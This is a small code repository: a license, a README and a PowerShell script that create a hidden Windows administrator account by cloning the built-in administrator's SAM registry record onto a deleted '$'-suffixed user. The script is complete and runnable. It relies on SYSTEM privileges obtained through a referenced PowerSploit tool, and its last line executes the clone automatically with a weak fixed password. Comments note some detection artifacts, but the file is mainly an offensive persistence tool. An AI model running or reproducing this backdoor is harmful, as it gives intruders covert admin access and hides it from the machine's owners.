├── LICENSE ├── README.md └── Windows-User-Clone.ps1 /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Windows-User-Clone 2 | Create a hidden account 3 | 4 | This script requires System privileges. You can use Invoke-TokenManipulation.ps1 to get System privileges and create the clone user. 5 | 6 | Link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1 7 | 8 | Author: Evilcg and 3gstuent 9 | 10 | Evilcg's way to achieve the same goal: 11 | 12 | https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1 13 | -------------------------------------------------------------------------------- /Windows-User-Clone.ps1: -------------------------------------------------------------------------------- 1 | function Create-Clone 2 | { 3 | <# 4 | .SYNOPSIS 5 | This script requires System privileges. You can use Invoke-TokenManipulation.ps1 to get System privileges and create the clone user. 
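Link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

Author: Evilcg and 3gstuent
Evilcg's way to achieve the same goal:
https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1

.DESCRIPTION
Persistence technique. The script (1) creates a local account (or resets the
password of an existing one) and adds it to Administrators, (2) exports the
account's SAM "Names" entry and its RID key with regedit.exe, (3) copies the
F record of the account to be cloned (default: administrator) into the new
account's RID key, (4) deletes the account with net.exe and (5) re-imports
both exports, so the SAM records survive the deletion. The README describes
the result as a "hidden account"; the supplied example uses a '$'-suffixed name.

Every step writes under HKLM:\SAM, which is why Main refuses to run unless
whoami reports "nt authority\system".

Operator / defender notes (all visible in the code below):
  * Spawns net.exe and regedit.exe; the password is passed on the net.exe
    command line, so command-line auditing will capture it.
  * Writes two .reg exports to %TEMP%. out.reg is a full dump of the new
    account's SAM RID key (F and V records) - treat it as credential
    material. Both files are removed in a finally block.
  * The create -> add-to-Administrators -> delete sequence is the kind of
    activity normally recorded in the Security event log.

.PARAMETER u
The clone username
.PARAMETER p
The clone user's password
.PARAMETER cu
The user to be cloned, default administrator
.EXAMPLE
Create-Clone -u abc -p abc123 -cu administrator
#>
Param(
    [Parameter(Mandatory=$true)]
    [String]
    $u,

    [Parameter(Mandatory=$true)]
    [String]
    $p,

    [Parameter(Mandatory=$false)]
    [String]
    $cu = "administrator"
)

# Fail fast. A half-applied clone (account already deleted, registry not yet
# re-imported) is worse than an aborted run, so cmdlet errors must terminate.
$ErrorActionPreference = 'Stop'

# Export one registry key to a .reg file with regedit.exe.
#   -Key  : full path including the HKEY_LOCAL_MACHINE prefix (regedit syntax)
#   -Path : destination file
# Start-Process -Wait guarantees the export has finished before the caller
# reads the file; the paths are quoted so a TEMP containing spaces does not
# split the argument. Throws if the file was not produced.
function Export-RegKey([string]$Key, [string]$Path)
{
    Start-Process -FilePath "regedit.exe" -ArgumentList @('/e', "`"$Path`"", "`"$Key`"") -Wait -WindowStyle Hidden
    if (-not (Test-Path -LiteralPath $Path)) {
        throw "regedit.exe did not export '$Key' to '$Path' (not SYSTEM, or key missing?)"
    }
}

# Import a .reg file silently with regedit.exe (/s = no prompts), waiting for completion.
function Import-RegFile([string]$Path)
{
    Start-Process -FilePath "regedit.exe" -ArgumentList @('/s', "`"$Path`"") -Wait -WindowStyle Hidden
}

# Create the local account $Username with $Password and put it in Administrators,
# or, if it already exists, just reset its password. Either way the password is
# then marked as never expiring.
function Create-user ([string]$Username,[string]$Password)
{
    $group = "Administrators"
    $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
    $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
    if ($existing -eq $null) {
        # The original echoed the plaintext password here; Write-Host output ends
        # up in console logs and transcripts, so only the username is printed.
        # NOTE: the password is still visible on the net.exe command line.
        Write-Host "Creating new local user $Username"
        & NET USER $Username $Password /add /y /expires:never | Out-Null
        Write-Host "Adding local user $Username to $group."
        & NET LOCALGROUP $group $Username /add | Out-Null
    }
    else {
        Write-Host "[*] Setting password for existing local user $Username"
        $existing.SetPassword($Password)
    }

    Write-Host "[*] Ensuring password for $Username never expires"
    # ADS_UF_DONT_EXPIRE_PASSWD = 0x10000, set through the same WinNT ADSI
    # provider used above. Replaces the wmic.exe call, which is deprecated on
    # current Windows builds and may be absent.
    $account = [ADSI]"WinNT://$env:COMPUTERNAME/$Username,user"
    $account.UserFlags = $account.UserFlags.Value -bor 0x10000
    $account.SetInfo()
}

# Return the 8-hex-digit RID key name (as used under SAM\Domains\Account\Users)
# for local user $user, by exporting its Names\<user> entry and parsing the
# default value's type, which regedit writes as hex(<RID>).
# Side effect: leaves the export in $env:temp\<user>.reg (Main removes it).
function GetUser-Key([string]$user)
{
    $regFile  = Join-Path $env:temp "$user.reg"
    $namesKey = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"
    Export-RegKey -Key $namesKey -Path $regFile
    $file = Get-Content -LiteralPath $regFile | Out-String
    $pattern = "@=hex\((.*?)\)\:"
    if (-not ($file -match $pattern)) {
        throw "Could not find the RID of '$user' in '$regFile'"
    }
    # RID key names are the RID zero-padded to 8 hex digits. The original used
    # a fixed "00000" prefix, which is only correct for 3-digit RIDs (e.g. 1f4,
    # 3e9); a RID of 0x1000 or more would have produced a 9-character name.
    $key = $matches[1].PadLeft(8, '0')
    Write-Host $key
    return $key
}

# Copy the F record of RID key $cukey onto RID key $ukey, then export the
# modified $ukey key to $env:temp\out.reg for re-import after the account is
# deleted. Reads $cu and $u from the enclosing scope for the status message.
function Clone ([string]$ukey,[string]$cukey)
{
    $ukey  = $ukey.Trim()
    $cukey = $cukey.Trim()
    $ureg  = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey"
    $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey"
    $cuFvalue = (Get-Item -Path $cureg).GetValue('F')
    if ($cuFvalue -eq $null) {
        throw "No F value found under '$cureg'"
    }
    Set-ItemProperty -Path $ureg -Name "F" -Value $cuFvalue
    # The original built this path as "...\$ukey.Trim()" inside a double-quoted
    # string, which interpolates $ukey and appends the literal text ".Trim()"
    # instead of calling it. Trimming above and interpolating here avoids that.
    $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
    Export-RegKey -Key $outreg -Path (Join-Path $env:temp "out.reg")
    Write-Host "Copy from $cu to $u success."
}

# Orchestrates the clone. Order matters: nothing destructive (the account
# deletion) happens until both exports exist and F has been copied.
function Main ()
{
    Write-Host "[*] Current token: " -NoNewline
    $token = whoami
    if ($token -ne "nt authority\system")
    {
        Write-Host " " $token
        Write-Host "[!] Low privileges."
        Write-Host "[*] Exit."
        # 'return' instead of 'Exit': Exit would terminate the whole hosting
        # PowerShell session, not just this function.
        return
    }
    Write-Host $token

    $userReg = Join-Path $env:temp "$u.reg"
    $outReg  = Join-Path $env:temp "out.reg"
    try {
        Write-Host "[*] Create User..."
        Create-user $u $p

        Write-Host "[*] Get User $u's Key: " -NoNewline
        $ukey = (GetUser-Key $u | Out-String).Trim()

        Write-Host "[*] Get User $cu's Key: " -NoNewline
        $cukey = (GetUser-Key $cu | Out-String).Trim()

        Write-Host "[*] Try to clone..."
        Clone $ukey $cukey

        Write-Host "[*] Delete User:$u"
        Net User $u /del | Out-Null

        Write-Host "[*] Import the registry"
        Import-RegFile $userReg
        Import-RegFile $outReg
    }
    finally {
        # Remove only the two files this script wrote. The original deleted
        # $env:temp\*.reg, taking any unrelated .reg files with it, and skipped
        # cleanup entirely if an earlier step failed.
        Write-Host "[*] Clean"
        Remove-Item -LiteralPath $userReg, $outReg -ErrorAction SilentlyContinue
    }
    Write-Output "[*] All Done."
}
Main
}
# Auto-runs on load with a fixed weak password; remove this line if the file is
# dot-sourced as a library and Create-Clone is to be invoked explicitly.
Create-Clone -u abc$ -p 123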